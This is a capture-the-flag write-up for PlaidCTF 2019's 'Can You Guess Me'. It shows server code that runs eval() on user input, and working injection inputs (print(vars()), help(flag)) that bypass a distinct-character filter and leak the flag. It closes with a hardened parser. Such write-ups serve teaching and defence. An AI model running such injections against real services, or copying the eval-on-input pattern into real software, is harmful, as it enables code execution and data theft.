PlaidCTF2019 - Can You Guess Me

Misc - 100pts

The Challenge

The challenge text links to the Python source of the guessing game running on the server.

Misc (100 pts)
Here's the source to a guessing game: here 

You can access the server at

nc canyouguessme.pwni.ng 12349
#! /usr/bin/env python3

from sys import exit
from secret import secret_value_for_password, flag, exec

print(r"")
print(r"")
print(r"  ____         __   __           ____                     __  __       ")
print(r" / ___|__ _ _ _\ \ / /__  _   _ / ___|_   _  ___  ___ ___|  \/  | ___  ")
print(r"| |   / _` | '_ \ V / _ \| | | | |  _| | | |/ _ \/ __/ __| |\/| |/ _ \ ")
print(r"| |__| (_| | | | | | (_) | |_| | |_| | |_| |  __/\__ \__ \ |  | |  __/ ")
print(r" \____\__,_|_| |_|_|\___/ \__,_|\____|\__,_|\___||___/___/_|  |_|\___| ")
print(r"                                                                       ")
print(r"")
print(r"")

try:
    val = 0
    inp = input("Input value: ")
    count_digits = len(set(inp))
    if count_digits <= 10:          # Make sure it is a number
        val = eval(inp)
    else:
        raise

    if val == secret_value_for_password:
        print(flag)
    else:
        print("Nope. Better luck next time.")
except:
    print("Nope. No hacking.")
    exit(1)

The Solution

The exploitable flaw in ‘Can You Guess Me’ is twofold:

  1. the use of Python's eval() built-in on user input; and
  2. ineffective input sanitisation that relies on len(set(inp)), the number of distinct characters, rather than on the length or content of the input

set() keeps only unique elements, so len(set(inp)) counts distinct characters, not length: arbitrarily long input passes the check as long as it uses at most 10 distinct characters. For example:

>>> len(set("aaaaaaaaaaaaaaaa"))
1

The input print(vars()) is sufficient to bypass the ineffective sanitisation: it is 13 characters long but uses only 10 distinct ones, so it reaches eval().

Other Python expressions are short enough to pass even a genuine 10-character limit, so the set() flaw is not needed. help(flag) produces a very helpful error message:

Input value: help(flag)
No Python documentation found for 'PCTF{hmm_so_you_were_Able_2_g0lf_it_down?_Here_have_a_flag}'.
Use help() to get the interactive help utility.
Use help(str) for help on the str class.

Nope. Better luck next time.
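The following is an added example, not code from the challenge or the original write-up. It puts the challenge's distinct-character check beside a hardened replacement that accepts only a decimal integer literal and never calls eval(), and runs both over the inputs discussed above (the repeated-character string, print(vars()) and help(flag)). The secret value and the flag are constructed placeholders; the real ones are not on the page.

```python
import re

# Constructed secret for the demo; the real secret_value_for_password is not known.
SECRET_VALUE = 4242
FLAG_PLACEHOLDER = "<flag>"

# ASCII digits only. str.isdigit() is not used because it also accepts
# Unicode digit characters such as '²' that int() then rejects.
DIGIT_RE = re.compile(r"[0-9]{1,10}")


def weak_filter_accepts(inp):
    # The challenge's check: counts DISTINCT characters, so the total length is
    # unbounded and nothing restricts the characters to digits.
    return len(set(inp)) <= 10


def parse_guess(inp):
    # Hardened replacement: accept only a 1..10 digit decimal literal and parse it
    # with int(); the input is never evaluated as code.
    # Returns the integer, or None if the input is rejected.
    inp = inp.strip()
    if DIGIT_RE.fullmatch(inp) is None:
        return None
    return int(inp)


def check_guess(inp, secret=SECRET_VALUE):
    # Returns the message the hardened game would print for this input.
    val = parse_guess(inp)
    if val is None:
        return "Nope. No hacking."
    if val == secret:
        return FLAG_PLACEHOLDER
    return "Nope. Better luck next time."


if __name__ == "__main__":
    samples = ["4242", "a" * 16, "print(vars())", "help(flag)", "12345678901"]
    for sample in samples:
        print(f"{sample!r:20} weak filter passes: {weak_filter_accepts(sample)!s:5} "
              f"hardened game says: {check_guess(sample)}")
```

The weak filter lets every non-numeric sample through to eval(), while the hardened parser rejects them and still accepts legitimate guesses such as "4242"; only the fixed-width digit pattern bounds the accepted length.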